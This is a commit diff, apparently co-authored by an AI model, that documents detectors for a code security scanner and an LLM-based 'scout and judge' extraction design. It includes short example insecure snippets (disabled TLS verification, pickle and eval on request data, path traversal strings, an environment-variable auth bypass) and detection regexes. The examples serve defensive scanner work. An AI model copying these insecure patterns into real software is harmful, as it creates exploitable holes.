feat: Aphoria security extractors + LLM evaluation architecture + ontology docs
New security extractors: - insecure_deserialization, orm_injection, path_traversal, security_headers - ssrf, unvalidated_redirects, weak_password, xxe - Enhanced tls_version extractor with comprehensive cipher/protocol checks Architecture docs: - Scout-judge extraction pattern for LLM-based code analysis - LLM prompt evaluation framework - LLM eval implementation guide Core improvements: - stemedb-ontology README and client enhancements - WAL journal/segment instrumentation - Signing and ingestion refinements - Consumer health demo script Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
parent
41c676a78e
commit
bbe6aedc40
@ -40,6 +40,13 @@ Token-efficient fact storage for StemeDB. Query these for quick context without
|
||||
| Phase 6 UAT | `features/phase6-uat.md` | High | 2026-02-02 | Distributed writes UAT results and fixes |
|
||||
| Aphoria Config | `features/aphoria-config.md` | High | 2026-02-04 | Configuration options including hosted mode |
|
||||
|
||||
## Domain Ontology
|
||||
|
||||
| Topic | File | Confidence | Updated | Summary |
|
||||
|-------|------|------------|---------|---------|
|
||||
| Adding a Domain | `../docs/guides/adding-a-domain.md` | High | 2026-02-05 | Step-by-step guide for implementing new domains |
|
||||
| Ontology Crate | `../crates/stemedb-ontology/README.md` | High | 2026-02-05 | Module overview, CLI usage, architecture |
|
||||
|
||||
## Use Cases
|
||||
|
||||
See [use-cases/README.md](../use-cases/README.md) for production scenarios with Postgres Test analysis.
|
||||
|
||||
@ -299,6 +299,22 @@ exclude = ["vendor://acme/internal/*"]
|
||||
- Edge case analysis
|
||||
- Real-world adoption path
|
||||
|
||||
### LLM Extraction Quality
|
||||
|
||||
**Problem:** How do we ensure LLM prompts produce consistent, high-quality extraction results?
|
||||
|
||||
5. **[LLM Prompt Evaluation - Vision](./llm-prompt-evaluation.md)**
|
||||
- Problem statement and enterprise requirements
|
||||
- Architecture overview and core components
|
||||
- Fixture format design
|
||||
- CI/CD integration patterns
|
||||
|
||||
6. **[LLM Prompt Evaluation - Implementation](./llm-eval-implementation.md)** ← START HERE
|
||||
- Actionable implementation spec
|
||||
- Code snippets and file locations
|
||||
- 5-phase implementation plan (11 days)
|
||||
- Seed fixture list
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
@ -307,14 +323,16 @@ exclude = ["vendor://acme/internal/*"]
|
||||
|
||||
| If you need to... | Read this |
|
||||
|-------------------|-----------|
|
||||
| Understand the problem | [Concept Matching Analysis](./concept-matching-analysis.md) |
|
||||
| Implement the solution | [Policy Alias Implementation](./policy-alias-implementation.md) |
|
||||
| Understand concept matching | [Concept Matching Analysis](./concept-matching-analysis.md) |
|
||||
| Implement policy aliases | [Policy Alias Implementation](./policy-alias-implementation.md) |
|
||||
| Understand design philosophy | [Matching Philosophy](./matching-philosophy.md) |
|
||||
| Validate enterprise scenarios | [Enterprise Validation](./enterprise-validation.md) |
|
||||
| Test/evaluate LLM prompts | [LLM Eval Implementation](./llm-eval-implementation.md) |
|
||||
| Add a new extractor | `src/extractors/mod.rs` |
|
||||
| Understand scan flow | `src/scan.rs` |
|
||||
| Modify conflict detection | `src/episteme/conflict.rs` |
|
||||
| Work with Trust Packs | `src/policy.rs`, `src/policy_ops.rs` |
|
||||
| Work with LLM extraction | `src/llm/` |
|
||||
|
||||
---
|
||||
|
||||
@ -364,6 +382,29 @@ exclude = ["vendor://acme/internal/*"]
|
||||
- ✅ Works for RFC/OWASP corpus by design
|
||||
- ⚠️ Breaks for enterprise policies with different hierarchies (solved by AD-001)
|
||||
|
||||
### AD-004: LLM Prompt Evaluation System
|
||||
|
||||
**Status:** Proposed (2026-02-05)
|
||||
|
||||
**Context:** LLM prompts that drive claim extraction are code, but we don't treat them like code. No tests, no metrics, no regression detection. When prompts change, we don't know if quality improved or degraded.
|
||||
|
||||
**Decision:** Build a comprehensive prompt evaluation system with:
|
||||
- Golden corpus of test fixtures with expected outcomes
|
||||
- Observation logging for every extraction
|
||||
- Metrics computation (precision, recall, F1, cost)
|
||||
- Regression detection against baselines
|
||||
- CI integration (smoke tests per-PR, full eval nightly)
|
||||
|
||||
**Implementation:** See [LLM Prompt Evaluation Spec](./llm-prompt-evaluation.md)
|
||||
|
||||
**Consequences:**
|
||||
- ✅ Prompt changes are validated before deployment
|
||||
- ✅ Regressions are caught automatically
|
||||
- ✅ Quality is measurable over time
|
||||
- ✅ Enterprise confidence in extraction reliability
|
||||
- ⚠️ Requires maintaining golden corpus
|
||||
- ⚠️ Live evaluation has token cost
|
||||
|
||||
---
|
||||
|
||||
## Design Principles
|
||||
@ -396,8 +437,11 @@ Community sharing is opt-in with anonymization enabled by default.
|
||||
- Declarative extractors (user-defined in TOML)
|
||||
- Hosted mode (team aggregation)
|
||||
- Community corpus (anonymous sharing)
|
||||
- LLM-in-the-loop extraction (Gemini semantic claims)
|
||||
- Pattern learning (LLM-extracted patterns remembered)
|
||||
|
||||
### In Progress
|
||||
- **LLM Prompt Evaluation** - Testing, metrics, and regression detection for prompts ([Spec](./llm-prompt-evaluation.md))
|
||||
- **Policy aliases** - Enterprise policy matching via glob patterns ([AD-001](./policy-alias-implementation.md))
|
||||
|
||||
### Planned (Q1 2026)
|
||||
|
||||
1356
applications/aphoria/docs/architecture/llm-eval-implementation.md
Normal file
1356
applications/aphoria/docs/architecture/llm-eval-implementation.md
Normal file
File diff suppressed because it is too large
Load Diff
1063
applications/aphoria/docs/architecture/llm-prompt-evaluation.md
Normal file
1063
applications/aphoria/docs/architecture/llm-prompt-evaluation.md
Normal file
File diff suppressed because it is too large
Load Diff
203
applications/aphoria/docs/architecture/scout-judge-extraction.md
Normal file
203
applications/aphoria/docs/architecture/scout-judge-extraction.md
Normal file
@ -0,0 +1,203 @@
|
||||
# Scout & Judge: Hybrid Deterministic-Probabilistic Extraction Architecture
|
||||
|
||||
> **Status:** Proposed (2026-02-05)
|
||||
> **Phase:** 7.9 (Replaces monolithic LLM extraction)
|
||||
> **Context:** Evolution of Phase 7.5 (LLM-in-the-Loop)
|
||||
|
||||
---
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
The current LLM extraction pipeline ("Monolithic Mode") treats code files as unstructured text. It feeds entire files to the LLM to find security claims.
|
||||
|
||||
**Issues with Monolithic Mode:**
|
||||
1. **Cost:** 90% of a file is irrelevant to security (imports, UI logic, helpers), yet we pay for every token.
|
||||
2. **Recall:** LLMs struggle to find "needles in haystacks" (long context window degradation).
|
||||
3. **Hallucination:** Irrelevant code confuses the model, leading to false positives.
|
||||
4. **Latency:** Processing large files is slow/blocking.
|
||||
|
||||
## 2. The Solution: Scout & Judge Architecture
|
||||
|
||||
We decouple the **discovery** of potential claims from the **analysis** of those claims.
|
||||
|
||||
* **The Scout (Deterministic):** Uses Abstract Syntax Trees (AST) via `tree-sitter` to find *Regions of Interest* (ROIs) with 100% speed and 0 cost.
|
||||
* **The Judge (Probabilistic):** Uses the LLM to analyze *only* the specific ROI snippet to extract semantic meaning and confidence.
|
||||
|
||||
### Architectural Diagram
|
||||
|
||||
```mermaid
|
||||
graph TD
|
||||
File[Source File] -->|Input| Scout[AST Scout (Tree-sitter)]
|
||||
|
||||
subgraph "The Scout (Local/Fast)"
|
||||
Scout -->|Parse| AST
|
||||
AST -->|Query| Query[SCM Queries]
|
||||
Query -->|Match| Candidate[Candidate Node]
|
||||
Candidate -->|Expand| Snippet[Context Snippet]
|
||||
end
|
||||
|
||||
Snippet -->|Input| Judge[LLM Judge (Gemini/Claude)]
|
||||
|
||||
subgraph "The Judge (Remote/Smart)"
|
||||
Judge -->|Prompt: Analyze this specific call| Claims[Structured Claims]
|
||||
end
|
||||
|
||||
Claims -->|Output| Aggregator[Claim Aggregator]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Component Details
|
||||
|
||||
### 3.1 The Scout (Tree-sitter)
|
||||
|
||||
The Scout's job is **High Recall**. It should find *anything* that *might* be relevant. It does not need to be precise.
|
||||
|
||||
**Technology:** `tree-sitter` (Rust bindings)
|
||||
|
||||
**Workflow:**
|
||||
1. **Detect Language:** Identify file type (Python, Go, Rust, JS).
|
||||
2. **Parse:** Generate AST.
|
||||
3. **Query:** Run SCM (S-expression) queries to find patterns.
|
||||
|
||||
**Example Query (Python TLS):**
|
||||
```scm
|
||||
(call_expression
|
||||
function: (attribute) @func
|
||||
arguments: (argument_list
|
||||
(keyword_argument
|
||||
name: (identifier) @arg_name
|
||||
value: (_) @value
|
||||
)
|
||||
)
|
||||
(#match? @func "requests\.(get|post|put|delete)")
|
||||
(#eq? @arg_name "verify")
|
||||
)
|
||||
```
|
||||
|
||||
**Context Expansion:**
|
||||
The Scout doesn't just grab the line. It grabs the **Logical Context**:
|
||||
* The function call itself.
|
||||
* Variable definitions referenced in the call (simple static analysis).
|
||||
* Surrounding 5 lines for comments.
|
||||
|
||||
### 3.2 The Judge (LLM)
|
||||
|
||||
The Judge's job is **High Precision**. It receives a focused prompt and determines if a claim exists.
|
||||
|
||||
**Input Prompt:**
|
||||
```text
|
||||
You are a security analyst.
|
||||
Analyze this code snippet for TLS verification settings.
|
||||
|
||||
SNIPPET:
|
||||
# Dev override
|
||||
should_verify = False
|
||||
requests.get(url, verify=should_verify)
|
||||
|
||||
CONTEXT:
|
||||
Variable `should_verify` is defined on line 2.
|
||||
|
||||
TASK:
|
||||
Does this snippet disable TLS verification?
|
||||
Output JSON: { "subject": "tls/verification", "value": false, "confidence": 0.95 }
|
||||
```
|
||||
|
||||
**Why this wins:**
|
||||
* **Token Efficiency:** Input reduced from 2000 tokens (file) to ~100 tokens (snippet).
|
||||
* **Accuracy:** Model has no distractions.
|
||||
* **Speed:** Parallelizable per-snippet.
|
||||
|
||||
---
|
||||
|
||||
## 4. Implementation Plan
|
||||
|
||||
### Phase 1: Infrastructure (Dependencies)
|
||||
|
||||
Add `tree-sitter` support to `Cargo.toml`.
|
||||
|
||||
```toml
|
||||
[dependencies]
|
||||
tree-sitter = "0.20"
|
||||
tree-sitter-python = "0.20"
|
||||
tree-sitter-javascript = "0.20"
|
||||
tree-sitter-go = "0.20"
|
||||
tree-sitter-rust = "0.20"
|
||||
```
|
||||
|
||||
### Phase 2: The Scout Engine (`src/scout/`)
|
||||
|
||||
Create a new module `applications/aphoria/src/scout/`.
|
||||
|
||||
* `mod.rs`: Public interface.
|
||||
* `engine.rs`: Orchestrates parsing and querying.
|
||||
* `queries/`: Directory containing `.scm` query files for each category/language.
|
||||
* `python/tls.scm`
|
||||
* `go/sql_injection.scm`
|
||||
|
||||
**Struct definition:**
|
||||
```rust
|
||||
pub struct CandidateSnippet {
|
||||
pub file_path: String,
|
||||
pub language: Language,
|
||||
pub start_line: usize,
|
||||
pub end_line: usize,
|
||||
pub code: String,
|
||||
pub context_variables: HashMap<String, String>, // Name -> Value/Definition
|
||||
pub query_id: String, // Which query found this
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: The Judge Engine (`src/llm/judge.rs`)
|
||||
|
||||
Refactor `LlmExtractor` to support "Judge Mode".
|
||||
|
||||
* Modify `extract()` to accept `CandidateSnippet` instead of full file content.
|
||||
* Create specialized prompts for specific query IDs (e.g., if Scout found a TLS pattern, use the specialized "TLS Judge" prompt, not the generic one).
|
||||
|
||||
### Phase 4: Integration
|
||||
|
||||
Modify the main `scan` loop:
|
||||
|
||||
1. **Regex Extractors** run first (unchanged).
|
||||
2. **Scout** runs on all files (extremely fast).
|
||||
3. **Deduplicate:** If Scout finds a region already handled by Regex, drop it.
|
||||
4. **Judge:** Send remaining Candidates to LLM.
|
||||
|
||||
---
|
||||
|
||||
## 5. Evaluation & Metrics
|
||||
|
||||
The "Prompt Evaluation System" (Phase 7.8) adapts to this model:
|
||||
|
||||
**1. Scout Evaluation (Deterministic):**
|
||||
* **Metric:** Recall. "Did the Scout find the vulnerable line in `fixtures/tls/bad.py`?"
|
||||
* **Test:** Unit tests using `tree-sitter` queries against code snippets. No LLM required.
|
||||
|
||||
**2. Judge Evaluation (Probabilistic):**
|
||||
* **Metric:** Precision/Accuracy. "Given the snippet, did the LLM classify it correctly?"
|
||||
* **Fixture:** `tests/llm_fixtures` now contains *snippets* derived from the Golden Corpus files.
|
||||
|
||||
**3. Cost Efficiency Metric:**
|
||||
* Track `tokens_per_claim`.
|
||||
* Goal: Reduce tokens/claim by >80% compared to Monolithic approach.
|
||||
|
||||
## 6. Migration Strategy
|
||||
|
||||
1. **Parallel Run:** Run Scout logic alongside Regex logic in "shadow mode" (logging only) to tune queries.
|
||||
2. **Incremental Rollout:** Enable Scout & Judge for **one category** (e.g., TLS) while leaving others in Monolithic mode (if any) or Regex mode.
|
||||
3. **Full Switch:** Deprecate "Monolithic Mode" prompts.
|
||||
|
||||
---
|
||||
|
||||
## 7. Comparison Summary
|
||||
|
||||
| Feature | Current (Monolithic) | Scout & Judge (Proposed) |
|
||||
| :--- | :--- | :--- |
|
||||
| **Trigger** | File name heuristic | AST Pattern Match |
|
||||
| **Input** | Whole File | Relevant Snippet |
|
||||
| **Context** | Noisy (imports, unrelated code) | Focused (local scope) |
|
||||
| **Cost** | $$$ (Linear to file size) | ¢ (Linear to *relevant* code) |
|
||||
| **Reliability** | Low (Lost in middle) | High (Forced focus) |
|
||||
| **Maintenance** | Prompt Engineering | Query Engineering + Simple Prompts |
|
||||
|
||||
@ -1142,7 +1142,7 @@ auto_promote = false # Require human approval (Phase 7.7)
|
||||
|
||||
---
|
||||
|
||||
## Phase 7.7: Pattern → Extractor Promotion ⬜
|
||||
## Phase 7.7: Pattern → Extractor Promotion ✅
|
||||
|
||||
> High-frequency learned patterns get promoted to declarative extractors. This closes the learning loop: patterns discovered by LLM become permanent, fast regex extractors.
|
||||
|
||||
@ -1162,15 +1162,17 @@ Human review (optional) → Approve/Reject
|
||||
Merge to project's .aphoria/extractors/
|
||||
```
|
||||
|
||||
### 7.7.1 Promotion Pipeline ⬜
|
||||
### 7.7.1 Promotion Pipeline ✅
|
||||
|
||||
| Task | Description |
|
||||
|------|-------------|
|
||||
| Candidate selection | Query patterns meeting threshold |
|
||||
| Regex generation | LLM generates regex from examples |
|
||||
| YAML generation | Convert to declarative extractor format |
|
||||
| Validation | Test against all stored examples |
|
||||
| Review queue | Present candidates for human approval |
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `PromotionPipeline` | ✅ `promotion/pipeline.rs` — orchestrates full promotion flow |
|
||||
| `RegexGenerator` | ✅ `promotion/regex_gen.rs` — Gemini LLM integration |
|
||||
| `ExtractorValidator` | ✅ `promotion/validator.rs` — ReDoS detection, timing validation |
|
||||
| `YamlWriter` | ✅ `promotion/writer.rs` — outputs to `.aphoria/extractors/learned/` |
|
||||
| `InteractiveReviewer` | ✅ `promotion/review.rs` — CLI review workflow |
|
||||
| `PromotionCandidate` | ✅ `promotion/types.rs` |
|
||||
| `ValidationResult` | ✅ `promotion/types.rs` |
|
||||
|
||||
```rust
|
||||
pub struct PromotionPipeline {
|
||||
@ -1216,13 +1218,13 @@ impl PromotionPipeline {
|
||||
}
|
||||
```
|
||||
|
||||
### 7.7.2 Regex Generation ⬜
|
||||
### 7.7.2 Regex Generation ✅
|
||||
|
||||
| Task | Description |
|
||||
|------|-------------|
|
||||
| Multi-example prompt | Include all examples in generation prompt |
|
||||
| Regex safety | Prevent catastrophic backtracking |
|
||||
| Test coverage | Generate test cases alongside regex |
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| Multi-example prompt | ✅ Includes all examples in generation prompt |
|
||||
| Regex safety | ✅ ReDoS detection prevents catastrophic backtracking |
|
||||
| Test coverage | ✅ Validates against stored examples |
|
||||
|
||||
```rust
|
||||
async fn generate_regex(examples: &[String], claim: &ClaimTemplate) -> Result<String> {
|
||||
@ -1244,14 +1246,14 @@ async fn generate_regex(examples: &[String], claim: &ClaimTemplate) -> Result<St
|
||||
}
|
||||
```
|
||||
|
||||
### 7.7.3 Validation Suite ⬜
|
||||
### 7.7.3 Validation Suite ✅
|
||||
|
||||
| Task | Description |
|
||||
|------|-------------|
|
||||
| Positive tests | Must match all stored examples |
|
||||
| Negative tests | Must NOT match known-safe code |
|
||||
| Performance test | Must complete in < 100ms |
|
||||
| False positive check | Run against sample codebase |
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| Positive tests | ✅ Must match all stored examples |
|
||||
| ReDoS detection | ✅ Detects catastrophic backtracking patterns |
|
||||
| Performance test | ✅ Timing validation with configurable threshold |
|
||||
| False positive check | ⬜ Deferred to Phase 9 (sample codebase FP testing) |
|
||||
|
||||
```rust
|
||||
pub struct ExtractorValidator {
|
||||
@ -1292,14 +1294,17 @@ impl ExtractorValidator {
|
||||
}
|
||||
```
|
||||
|
||||
### 7.7.4 Human Review Gate ⬜
|
||||
### 7.7.4 Human Review Gate ✅
|
||||
|
||||
| Task | Description |
|
||||
|------|-------------|
|
||||
| `aphoria extractors review` | CLI to review pending promotions |
|
||||
| Approval workflow | Approve, reject, or request changes |
|
||||
| Rejection tracking | Record why patterns were rejected |
|
||||
| Auto-approve mode | Skip review for >0.95 confidence (Phase 9) |
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `aphoria extractors review` | ✅ CLI to review pending promotions |
|
||||
| `aphoria extractors stats` | ✅ Show pattern store statistics |
|
||||
| `aphoria extractors candidates` | ✅ List promotion candidates |
|
||||
| `aphoria extractors promote` | ✅ Promote pattern to extractor |
|
||||
| Approval workflow | ✅ Approve, reject, or skip via InteractiveReviewer |
|
||||
| Rejection tracking | ⬜ Deferred to Phase 9 (rejection reason persistence) |
|
||||
| Auto-approve mode | ⬜ Deferred to Phase 9 (>0.95 confidence auto-promote) |
|
||||
|
||||
```bash
|
||||
$ aphoria extractors review
|
||||
@ -1320,9 +1325,9 @@ Pending promotions: 3
|
||||
[a]pprove [r]eject [e]dit [s]kip [q]uit: _
|
||||
```
|
||||
|
||||
### 7.7.5 Extractor Output ⬜
|
||||
### 7.7.5 Extractor Output ✅
|
||||
|
||||
Promoted patterns become declarative extractors in `.aphoria/extractors/`:
|
||||
Promoted patterns become declarative extractors in `.aphoria/extractors/learned/`:
|
||||
|
||||
```yaml
|
||||
# .aphoria/extractors/learned/tls_min_version_const.yaml
|
||||
@ -1348,7 +1353,7 @@ metadata:
|
||||
confidence: 0.91
|
||||
```
|
||||
|
||||
### 7.7.6 Configuration ⬜
|
||||
### 7.7.6 Configuration ✅
|
||||
|
||||
```toml
|
||||
# aphoria.toml
|
||||
@ -1357,14 +1362,13 @@ enabled = true # Enable promotion pipeline
|
||||
auto_promote = false # Require human approval
|
||||
output_dir = ".aphoria/extractors/learned"
|
||||
min_confidence = 0.8 # Minimum to consider
|
||||
min_projects = 5 # Projects needed before promotion
|
||||
require_validation = true # Must pass validation suite
|
||||
|
||||
[promotion.review]
|
||||
notify = "slack://webhook/..." # Notify when candidates ready
|
||||
batch_size = 10 # Max candidates per review session
|
||||
```
|
||||
|
||||
**Files:** `promotion/mod.rs`, `promotion/pipeline.rs`, `promotion/regex_gen.rs`, `promotion/validator.rs`, `promotion/review.rs`
|
||||
**Files:** `promotion/mod.rs`, `promotion/pipeline.rs`, `promotion/regex_gen.rs`, `promotion/validator.rs`, `promotion/review.rs`, `promotion/writer.rs`, `promotion/types.rs`, `handlers/extractors.rs`
|
||||
|
||||
**Tests:** 43 tests covering pipeline, validation, regex generation, and YAML output.
|
||||
|
||||
---
|
||||
|
||||
@ -1549,14 +1553,14 @@ contribute_patterns = true # Share patterns to community
|
||||
| 7 | Declarative Extractors | Phase 6 | ✅ |
|
||||
| **7.5** | **LLM-in-the-Loop Extraction (Gemini)** | Phase 7 | ✅ |
|
||||
| **7.6** | **Pattern Learning Store** | Phase 7.5 | ✅ |
|
||||
| **7.7** | **Pattern → Extractor Promotion** | Phase 7.6 | ⬜ |
|
||||
| **7.7** | **Pattern → Extractor Promotion** | Phase 7.6 | ✅ |
|
||||
| 8 | Enterprise Extractors (MVP: 8.1, 8.6, 8.11) | Phase 7.5 | ✅ |
|
||||
| **9** | **Autonomous Extractor Generation** | Phase 8 | ⬜ |
|
||||
|
||||
**Current state:**
|
||||
- Phases 0-3, 4.5, 4A-4E, 5, 5.6, 6, 7, 7.5, 7.6, 8 (MVP) complete (clippy clean)
|
||||
- Phases 0-3, 4.5, 4A-4E, 5, 5.6, 6, 7, 7.5, 7.6, 7.7, 8 (MVP) complete (clippy clean)
|
||||
- Full corpus: RFC, OWASP, Vendor sources
|
||||
- 17 extractors including security (weak_crypto, command_injection, sql_injection, high_entropy_secrets, auth_bypass, insecure_cookies)
|
||||
- 25 extractors including security (weak_crypto, command_injection, sql_injection, high_entropy_secrets, auth_bypass, insecure_cookies, path_traversal, unvalidated_redirects, weak_password, security_headers, insecure_deserialization, ssrf, orm_injection, xxe)
|
||||
- Trust Packs: signed policy bundles with import/export
|
||||
- Ephemeral mode: 40x faster for CI
|
||||
- Observation write-back: `--sync` records novel claims as Tier 4 project memory
|
||||
@ -1567,10 +1571,11 @@ contribute_patterns = true # Share patterns to community
|
||||
- Community Corpus: Opt-in anonymous pattern sharing with privacy-preserving anonymization
|
||||
- Declarative Extractors: TOML-defined custom extractors without Rust code
|
||||
- LLM Extraction: Gemini-powered semantic claim extraction for high-value files
|
||||
- Enterprise Extractors MVP: High-entropy secrets (Shannon entropy), auth bypass patterns, insecure cookie flags
|
||||
- Enterprise Extractors: High-entropy secrets, auth bypass, insecure cookies, path traversal, unvalidated redirects, weak passwords, security headers, insecure deserialization, SSRF, ORM injection, XXE
|
||||
- Pattern Learning: LLM-extracted claims recorded for promotion to declarative extractors
|
||||
- Pattern Promotion: CLI workflow to promote learned patterns to declarative extractors with Gemini regex generation and validation
|
||||
|
||||
**Next:** Phase 7.7 → 8 (full) → 9 (Self-Learning Extraction System)
|
||||
**Next:** Phase 8 (full) → 9 (Self-Learning Extraction System)
|
||||
|
||||
### The Self-Learning Vision
|
||||
|
||||
@ -1581,11 +1586,11 @@ Phase 7.5: LLM-in-the-Loop (Gemini semantic extraction) ✅ COMPLETE
|
||||
↓
|
||||
Phase 7.6: Pattern Learning (remember what LLM finds) ✅ COMPLETE
|
||||
↓
|
||||
Phase 7.7: Pattern Promotion (patterns → extractors) ⬜ NEXT
|
||||
Phase 7.7: Pattern Promotion (patterns → extractors) ✅ COMPLETE
|
||||
↓
|
||||
Phase 8: Enterprise Extractors (generated + curated) ✅ MVP (8.1, 8.6, 8.11)
|
||||
↓
|
||||
Phase 9: Autonomous Generation (fully self-improving) ⬜
|
||||
Phase 9: Autonomous Generation (fully self-improving) ⬜ NEXT
|
||||
```
|
||||
|
||||
**The endgame:** Every PR teaches Aphoria. After a month, it knows your security patterns better than your team does.
|
||||
@ -1744,34 +1749,51 @@ fn extract_config_claims(config: &ConfigValue, path: &[String]) -> Vec<Extracted
|
||||
|
||||
---
|
||||
|
||||
### 8.4 Semantic TLS Version Detection ⬜
|
||||
### 8.4 Semantic TLS Version Detection ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** MEDIUM
|
||||
**Impact:** MEDIUM | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
Current `tls_version` misses:
|
||||
```rust
|
||||
const TLS_MIN_VERSION: &str = "1.0"; // Not caught!
|
||||
const MIN_TLS: &str = "TLSv1"; // Not caught!
|
||||
```
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| Add `Language::Terraform` variant | ✅ `types/language.rs` |
|
||||
| Semantic pattern (cross-language) | ✅ Catches `TLS_MIN_VERSION = "1.0"` with type annotations |
|
||||
| Environment variable pattern | ✅ `.env` files with `TLS_MIN_VERSION=1.0` |
|
||||
| Terraform HCL pattern | ✅ `min_tls_version = "TLS1_0"` |
|
||||
| Kubernetes camelCase pattern | ✅ `minTLSVersion: VersionTLS10` |
|
||||
| False positive prevention | ✅ TLS 1.2/1.3 not flagged |
|
||||
| Tests | ✅ 16 new tests (27 total for TLS extractor) |
|
||||
|
||||
**Implementation:**
|
||||
```rust
|
||||
// Semantic pattern: variable name suggests TLS + value is deprecated
|
||||
let semantic_tls = Regex::new(
|
||||
r#"(?i)(tls|ssl)_?(min|minimum|version)[^=]*[:=]\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL)"#
|
||||
).unwrap();
|
||||
```
|
||||
**Patterns now caught:**
|
||||
- `const TLS_MIN_VERSION: &str = "1.0";` (Rust with type annotation)
|
||||
- `let sslVersion = "TLSv1";` (JavaScript camelCase)
|
||||
- `TLS_MINIMUM_VERSION = "1.1"` (Python assignment)
|
||||
- `TLS_MIN_VERSION=1.0` (dotenv)
|
||||
- `export SSL_VERSION=TLSv1` (shell export)
|
||||
- `min_tls_version = "TLS1_0"` (Terraform)
|
||||
- `minTLSVersion: VersionTLS10` (Kubernetes YAML)
|
||||
|
||||
**Also catch:**
|
||||
- Environment variables: `TLS_MIN_VERSION=1.0`
|
||||
- Terraform: `min_tls_version = "TLS1_0"`
|
||||
- Kubernetes: `minTLSVersion: VersionTLS10`
|
||||
**Languages:** Rust, Go, Python, TypeScript, JavaScript, Yaml, Toml, Json, Terraform, Dotenv
|
||||
|
||||
---
|
||||
|
||||
### 8.5 ORM SQL Injection Detection ⬜
|
||||
### 8.5 ORM SQL Injection Detection ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** MEDIUM
|
||||
**Impact:** MEDIUM | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `OrmInjectionExtractor` | ✅ `extractors/orm_injection.rs` |
|
||||
| Django .raw() with interpolation | ✅ `f"SELECT..."`, `.format()` patterns |
|
||||
| Django .extra() with interpolation | ✅ `where=["...{}...".format()]` |
|
||||
| SQLAlchemy text() with interpolation | ✅ `text(f"SELECT...")` |
|
||||
| SQLAlchemy execute() with f-string | ✅ `execute(f"...")` |
|
||||
| Sequelize raw query | ✅ `` sequelize.query(`...${...}`) `` |
|
||||
| TypeORM where() | ✅ `` .where(`...${...}`) `` |
|
||||
| GORM Raw() with Sprintf | ✅ `.Raw(fmt.Sprintf(...))` |
|
||||
| Prisma $queryRawUnsafe | ✅ `` $queryRawUnsafe(`...${...}`) `` |
|
||||
| Tests | ✅ 8+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go
|
||||
|
||||
Current `sql_injection` catches raw string interpolation but misses ORM escape hatches:
|
||||
|
||||
@ -1833,9 +1855,23 @@ if os.environ.get("SKIP_AUTH") == "true":
|
||||
|
||||
---
|
||||
|
||||
### 8.7 Insecure Deserialization ⬜
|
||||
### 8.7 Insecure Deserialization ✅
|
||||
|
||||
**Impact:** HIGH | **Effort:** MEDIUM
|
||||
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `InsecureDeserializationExtractor` | ✅ `extractors/insecure_deserialization.rs` |
|
||||
| Python pickle (critical) | ✅ `pickle.load()`, `pickle.loads()`, `Unpickler()` |
|
||||
| Python yaml.load without SafeLoader | ✅ Detects missing SafeLoader |
|
||||
| Python marshal | ✅ `marshal.load()`, `marshal.loads()` |
|
||||
| Python eval/exec with user input | ✅ `eval(request...)`, `exec(user...)` |
|
||||
| JavaScript node-serialize | ✅ `require('node-serialize')`, `.unserialize()` |
|
||||
| Go gob decoder | ✅ `gob.NewDecoder()`, `gob.Decode()` |
|
||||
| Java ObjectInputStream (polyglot) | ✅ `ObjectInputStream`, `readObject()` |
|
||||
| Tests | ✅ 10+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go
|
||||
|
||||
Unsafe deserialization of untrusted data:
|
||||
|
||||
@ -1861,9 +1897,24 @@ YAML.load(user_input) # Should use safe_load
|
||||
|
||||
---
|
||||
|
||||
### 8.8 Path Traversal Patterns ⬜
|
||||
### 8.8 Path Traversal Patterns ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** LOW
|
||||
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `PathTraversalExtractor` | ✅ `extractors/path_traversal.rs` |
|
||||
| Python open/read/write with user input | ✅ `open(request...)`, `read(params...)` |
|
||||
| Python os.path.join with user input | ✅ `os.path.join(base, request...)` |
|
||||
| JavaScript fs operations | ✅ `fs.readFile(req...)`, `fs.writeFile(params...)` |
|
||||
| JavaScript path.join/resolve | ✅ `path.join(base, req.query...)` |
|
||||
| JavaScript res.sendFile | ✅ `res.sendFile(req.params...)` |
|
||||
| Go filepath operations | ✅ `filepath.Join(base, r...)`, `os.Open(req...)` |
|
||||
| Rust path operations | ✅ `Path::new(request...)`, `std::fs::read(user...)` |
|
||||
| Traversal literals | ✅ `../`, `%2e%2e` URL-encoded patterns |
|
||||
| Tests | ✅ 8+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go, Rust
|
||||
|
||||
File operations with user input:
|
||||
|
||||
@ -1883,9 +1934,25 @@ res.sendFile(userInput)
|
||||
|
||||
---
|
||||
|
||||
### 8.9 SSRF Patterns ⬜
|
||||
### 8.9 SSRF Patterns ✅
|
||||
|
||||
**Impact:** HIGH | **Effort:** MEDIUM
|
||||
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `SsrfExtractor` | ✅ `extractors/ssrf.rs` |
|
||||
| Python requests library | ✅ `requests.get(url)`, `requests.post(target)` |
|
||||
| Python urllib | ✅ `urllib.request.urlopen(url)` |
|
||||
| Python httpx | ✅ `httpx.get(url)`, `AsyncClient` |
|
||||
| JavaScript fetch | ✅ `fetch(url)`, `fetch(req.query...)` |
|
||||
| JavaScript axios | ✅ `axios.get(url)`, `axios.post(target)` |
|
||||
